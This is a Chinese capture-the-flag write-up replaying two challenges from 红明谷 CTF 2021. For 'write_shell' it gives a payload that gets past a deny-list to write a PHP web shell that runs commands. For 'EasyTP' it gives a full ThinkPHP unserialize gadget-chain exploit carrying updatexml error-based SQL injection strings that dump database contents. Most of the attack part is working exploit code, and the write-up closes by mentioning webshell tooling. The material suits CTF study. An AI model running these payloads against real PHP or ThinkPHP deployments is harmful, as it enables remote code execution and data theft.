[BUUOJ]红明谷CTF2021复现

write_shell

 <?php
error_reporting(0);       // silence all notices/warnings: a failed mkdir() or file_put_contents() below goes unreported
highlight_file(__FILE__); // print this script's own source to the client (the challenge is white-box by design)
/**
 * Deny-list gate for a single request value.
 *
 * Aborts the whole request with "hacker!!!" as soon as the value contains any
 * token of the pattern (case-insensitive); otherwise the value is handed back
 * untouched. Being a deny-list, anything the pattern does not enumerate passes.
 *
 * @param string $input raw value from the request
 * @return string the unchanged value, when no token matched
 */
function check($input)
{
    $hit = preg_match("/'| |_|php|;|~|\\^|\\+|eval|{|}/i", $input) === 1;
    if (!$hit) {
        return $input;
    }
    die('hacker!!!');
}

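/**
 * Run check() over every scalar inside $input, recursing into nested arrays.
 *
 * check() terminates the request on a hit, so returning normally means every
 * leaf passed. The previous version discarded the checked structure (each
 * recursive call assigned null into the array and the function returned null);
 * the checked value is now returned so a caller can actually use the result.
 *
 * @param mixed $input scalar or (nested) array of request values
 * @return mixed the same structure, every leaf having passed check()
 */
function waf($input)
{
    if (!is_array($input)) {
        return check($input);
    }
    foreach ($input as $key => $value) {
        $input[$key] = waf($value);
    }
    return $input;
}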

// One sandbox directory per client, keyed by the hash of the caller's address.
$dir = 'sandbox/' . md5($_SERVER['REMOTE_ADDR']) . '/';
if (!file_exists($dir)) {
    mkdir($dir); // result unchecked; with error_reporting(0) a failure here is invisible
}

$action = $_GET["action"] ?? "";
if ($action === 'pwd') {
    // Reveals the per-client path, i.e. where the file written below is served from.
    echo $dir;
} elseif ($action === 'upload') {
    // Request bytes land verbatim in an executable index.php. The only gate is the
    // deny-list in check(): it aborts the request on a hit and otherwise leaves the
    // data as is (waf()'s return value is not used here).
    $data = $_GET["data"] ?? "";
    waf($data);
    file_put_contents($dir . 'index.php', $data);
}
?>

php命令执行bypass:先传入action=pwd获得沙箱目录路径,然后直接发送payload。payload用%09(tab)代替空格、用`<?=`短标签和反引号代替被过滤的php/eval,这些都不在check()的正则黑名单里,所以能原样写进index.php。

?action=upload&data=<?=`cat%09/f*`?>

EasyTP

参考:

https://www.jianshu.com/p/41782991b4b2

直接看控制器:

<?php
namespace Home\Controller;
use Think\Controller;
class IndexController extends Controller
{
    /**
     * Default action: unserializes the raw request body, echoes the result,
     * then renders the view.
     *
     * NOTE(review): unserialize() on a client-controlled body is a
     * deserialization sink — any class the runtime can load may be instantiated
     * with caller-chosen property values. json_decode() is the safe replacement
     * when the body only needs to carry data.
     */
    public function index()
    {
        $body = file_get_contents('php://input');
        $value = unserialize(base64_decode($body));
        echo $value;
        $this->display();
    }

    /**
     * Same sink as index(), without the view render.
     */
    public function test()
    {
        $body = file_get_contents('php://input');
        $value = unserialize(base64_decode($body));
        echo $value;
    }
}

使用了unserialize函数,应该需要使用反序列化的洞,面向搜索引擎"挖洞": https://www.jianshu.com/p/41782991b4b2

结合手册就可以开始写payload,访问/index.php/Home/Index/test,然后直接打

虽然当时没打红明谷,但是数据库密码123456倒是听到很多师傅在说2333

exp

<?php
namespace Think\Db\Driver{
    use PDO;

    /**
     * Stand-in for the framework's Think\Db\Driver\Mysql: same fully-qualified
     * name and property names, so that unserialize() on the target rebuilds an
     * object of the real class carrying these values. Only data lives here.
     */
    class Mysql
    {
        /** PDO options; LOCAL_INFILE has to be on for the file read to work. */
        protected $options = [
            PDO::MYSQL_ATTR_LOCAL_INFILE => true,
        ];

        /** Connection parameters the rebuilt driver will use. */
        protected $config = [
            "debug"    => true,
            "database" => "test",      // any existing database works
            "hostname" => "127.0.0.1",
            "hostport" => "3306",
            "charset"  => "utf8",
            "username" => "root",
            "password" => "root",      // the BUU environment uses root
        ];
    }
}
namespace Think\Image\Driver{
    use Think\Session\Driver\Memcache;

    /**
     * Root of the serialized object graph, mirroring the framework's
     * Think\Image\Driver\Imagick. Its only content is a Memcache stand-in in
     * the private $img property.
     */
    class Imagick
    {
        private $img;

        public function __construct()
        {
            $this->img = new Memcache();
        }
    }
}
namespace Think\Session\Driver{
    use Think\Model;

    /**
     * Mirrors Think\Session\Driver\Memcache. Links the chain onward by holding
     * a Model stand-in in the protected $handle property.
     */
    class Memcache
    {
        protected $handle;

        public function __construct()
        {
            $this->handle = new Model();
        }
    }
}
namespace Think{
    use Think\Db\Driver\Mysql;

    /**
     * Mirrors Think\Model. Carries the Mysql driver stand-in plus a primary-key
     * record whose "table" entry is the error-based injection string; the
     * framework code that consumes this object on the target is presumably what
     * turns these properties into a query (that code is not shown here).
     */
    class Model
    {
        protected $options = [];
        protected $pk;
        protected $data = [];
        protected $db = null;

        public function __construct()
        {
            $this->db = new Mysql();
            $this->options['where'] = '';
            $this->pk = 'id';

            // Enumeration steps from the write-up, outermost first (each gave the
            // quoted result through the error message):
            // ~information_schema,mysql,performance_schema,sys,test~
            // "table" => "mysql.user where updatexml(1,concat(0x7e,mid((select(group_concat(schema_name))from(information_schema.schemata)),40),0x7e),1)#",
            // ~flag,users~
            // "table" => "mysql.user where updatexml(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where(table_schema=database())),0x7e),1)#",
            // ~flag~
            // "table" => "mysql.user where updatexml(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where(table_name='flag')),0x7e),1)#",
            // flag{fafdd279-cacb-4684-b918-7a23f3164d55}
            $record = [
                "table" => "mysql.user where updatexml(1,concat(0x7e,mid((select`*`from`flag`),30),0x7e),1)#",
                "where" => "1=1",
            ];
            $this->data[$this->pk] = $record;
        }
    }
}
namespace {
    // Emit the object graph in the form the target reads back:
    // serialize() first, then base64, matching its base64_decode/unserialize pair.
    $payload = serialize(new Think\Image\Driver\Imagick());
    print base64_encode($payload);
}

除了报错注入,赵总直接写shell,使用冰蝎连数据库导出数据库内容似乎更快一点